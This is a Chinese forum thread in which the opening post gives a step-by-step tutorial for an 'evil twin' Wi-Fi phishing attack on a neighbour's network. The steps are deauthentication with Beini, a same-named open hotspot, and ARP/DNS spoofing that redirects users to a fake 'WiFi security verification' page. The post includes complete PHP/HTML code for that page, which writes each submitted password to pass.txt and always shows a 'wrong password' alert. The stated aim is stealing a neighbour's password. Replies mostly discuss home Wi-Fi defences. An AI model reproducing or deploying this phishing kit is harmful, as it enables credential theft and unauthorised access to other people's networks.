搜索
查看: 15352|回复: 20
收起左侧

[教程] wifi截获欺骗

  [复制链接]
wgleiz
发表于 2015-9-26 09:19:46 | 显示全部楼层 |阅读模式
首先声明此文是转载的  觉得蛮实用 分享给大家 以供学习使用.  如果违规 请版主删帖

前几天家里断网了,只好想办法蹭蹭隔壁的网,可是对方密码太强了,只好想了这招来钓取WIFI密码。

利用beini给对方的wifi(下面简称:awifi)断网,建立同名wifi(下面简称bwifi:),bwifi中使用arp dns欺骗使用户访问的网址自动跳转到我们事先布置好的页面(所谓的"wifi安全验证"),来钓取wifi密码。

示意图: 1.jpg
 
1.首先我们要搭建好web服务器(我这里使用的是win7_32+apache,直接使用了xampp快速搭建)

2.下面附上钓鱼php,为了适应手机界面引入了‘bootstrap.min.css’这个在网上可以下到

文件存放到htdocs文件夹下
index.php
[mw_shl_code=html,true]<!DOCTYPE html>
<html>
<head>
    <meta charset="gb2312">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">
    <title>WIFI安全验证</title>
    <link href="bootstrap.min.css" rel="stylesheet">
    <link href="signin.css" rel="stylesheet">
</head>
<body>
<?php
$pass = @$_POST['password'];
if(strlen($pass)>7){
    $path='pass.txt';
    $f=fopen($path,'a');
    fwrite($f,$pass."\r\n");
    fclose($f);
}
?>
<div class="container">
    <form class="form-signin" action="index.php" method="post">
        <h3 class="form-signin-heading">请输入WIFI密码</h3>
        <label for="inputPassword" class="sr-only">Password</label>
        <input type="password" id="password" name="password" class="form-control" placeholder="WIFI 密码" required>
        <div class="checkbox">
            <label>
                <input type="checkbox" value="remember-me"> 记住密码
            </label>
            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
            <x style="color: #9d9d9d" onclick="alert('1.如果您忘记了WIFI密码n2.请按下路由器上的reset键n3.reset后WIFI密码为默认密码n4.默认密码在路由器的背面可以看到.')">忘记密码</x>
        </div>
        <button class="btn btn-lg btn-primary btn-block" type="submit" onclick="alert('t密码错误!tnt请重试t')">登陆 WIFI</button>
    </form>
</div>
</body>
</html>[/mw_shl_code]




signin.css
[mw_shl_code=css,true]body {
    padding-top: 40px;
    padding-bottom: 40px;
    background-color: #eee;
}
.form-signin {
    max-width: 330px;
    padding: 15px;
    margin: 0 auto;
}
.form-signin .form-signin-heading,
.form-signin .checkbox {
    margin-bottom: 10px;
}
.form-signin .checkbox {
    font-weight: normal;
}
.form-signin .form-control {
    position: relative;
    height: auto;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    padding: 10px;
    font-size: 16px;
}
.form-signin .form-control:focus {
    z-index: 2;
}
.form-signin input[type="email"] {
    margin-bottom: -1px;
    border-bottom-right-radius: 0;
    border-bottom-left-radius: 0;
}
.form-signin input[type="password"] {
    margin-bottom: 10px;
    border-top-left-radius: 0;
    border-top-right-radius: 0;
}[/mw_shl_code]

3.之后呢还需要新建一个pass.txt的文本文档用来接收钓到的密码

目录结构如下
&nbsp;htdocs
           /bootstrap.min
           /index.php
           /pass.txt
           /signin.css



4.在电脑上新建一个同名不加密wifi热点


5.arp dns欺骗跳转(这里就不详细说了网上有很多)


6.打开另一个电脑(beini系统)给对方的wifi进行断网攻击
&nbsp; 2.jpg

下面就坐等收密码啦,密码获取到后会在pass.txt中

有人说之前他钓不到鱼,
所以我说使用wifi同名伪装,会使手机只能显示出一个wifi,也就是信号好的wifi,这样连上后,打开页面提示是“wifi安全验证”(的障眼法),如果你一直连不上自家的wifi上不了网(其实是你一直在用beini给他断网,beini的断网攻击不需要连接上需要攻击的wifi,它其实是伪造用户给wifi服务端发送了一个断开wifi的请求包),是不是蛮愿意尝试登陆一下这个“wifi安全验证”的呢。“说不定验证一下就可以上网了呢”,就算骗不了一个人,可是两个呢,三个呢,只要他们知道密码&nbsp;&nbsp;肯定愿意来一试,谁管你是不是在钓鱼,人家只想上个网。


有人说使用随身wifi+虚拟机使用一台电脑来完成,以下是我的回复:
这个我有想过,随身wifi是可以减小工作量,而且有了随身wifi可以不用使用arp劫持,但是..........我是穷逼我买不起&nbsp; &nbsp;就算有了随身wifi应该也大可能一个电脑实现。首先,断网攻击是否是要在未连接任何wifi的情况下进行,如果是,那么既然物理机和虚拟机公用同一网卡恐怕不能一边释放wifi一边攻击。如果给物理机和虚拟机单独分配网卡,随身wifi分配给物理机,物理机自带无线网卡分配给虚拟机,或许可行。你可以尝试一下。我穷逼。。。买不起网卡,我现在还用这08年买的lenovo v470。。。而且硬盘之前还坏了,没钱换就换了个180块钱的,转速超慢。我就不想说什么了。。。




它会先创建一个伪造的无线访问接入点(AP)并把自己伪装成一个合法的WiFi AP,然后向合法无线访问接入点(AP)发动DoS攻击,或者在其周围创建一个射频干扰。

总而言之,原理是让用户设备断开原有无线连接,这样用户就会查找附近有没有可用的无线网络,从而就有可能连接到假的AP上。
如果能做到上面这点
可以使用wifidog来做一个钓鱼页面
xmmmmmmx
发表于 2015-9-30 23:24:09 | 显示全部楼层
自己家的WiFi睡觉就随手关电源,MAC绑定,信号调整到差不多就在家中心圈以内,关闭广播,设置界面绑定特定MAC,界面用户名密码超强,WiFi密码超强
wgleiz
 楼主| 发表于 2015-10-1 00:17:12 | 显示全部楼层
xmmmmmmx 发表于 2015-9-30 23:24
自己家的WiFi睡觉就随手关电源,MAC绑定,信号调整到差不多就在家中心圈以内,关闭广播,设置界面绑定特定M ...

信号放大原理 就像两个圆圈 a用户圆圈只能覆盖自己家里 b用户可以架设信号放大接收器 只要能覆盖到a家范围 就等于收得到a家信号
linjun942
发表于 2015-10-1 01:47:06 | 显示全部楼层
一直都是wif无密码 绑定MAC 随便让人连上 然后qos限制 保证蹭网的爽死(卡死)
kuroo
发表于 2015-10-3 15:33:47 | 显示全部楼层
linjun942 发表于 2015-10-1 01:47
一直都是wif无密码 绑定MAC 随便让人连上 然后qos限制 保证蹭网的爽死(卡死)

这是多么NC的节奏 你要是网吧网管这么做别人分分钟攻击死你呵呵
ktc
发表于 2015-10-6 21:01:01 | 显示全部楼层
对wifi我是这样想的:设置有较复杂的密码,开放SSID广播,有客人要连接我给你输入密码。但我不想有人查看我的密码或通过万能钥匙把密码漫天传播。但现实是很多人查看密码或装有万能钥匙把密码上传了。特别反感装有万能钥匙的!总的来说就是:你想用我的WIFI,经我批准后给你用,但你不要查看密码,特别是通过万能钥匙把密码上传后全世界公开。不知道如何能实现?
wsx520zdz
发表于 2015-10-7 10:09:53 | 显示全部楼层
ktc 发表于 2015-10-6 21:01
对wifi我是这样想的:设置有较复杂的密码,开放SSID广播,有客人要连接我给你输入密码。但我不想有人查看我 ...

启用路由器的访客网络,独立出一个网络给客人们用,不管他们怎么闹腾,影响不了你的主网络。具体能实现的其它功能看各品牌路由器的了。
DolceVita
发表于 2015-10-8 16:38:32 | 显示全部楼层
顶  一个   
咖啡甜味
发表于 2015-10-8 22:59:07 | 显示全部楼层
这个思路可行牛逼  就是编辑这个神马的挺复杂
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛|卡饭乐购| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 苏ICP备07004770号 ) GMT+8, 2019-9-18 13:59 , Processed in 0.048739 second(s), 4 queries , MemCache On.

快速回复 返回顶部 返回列表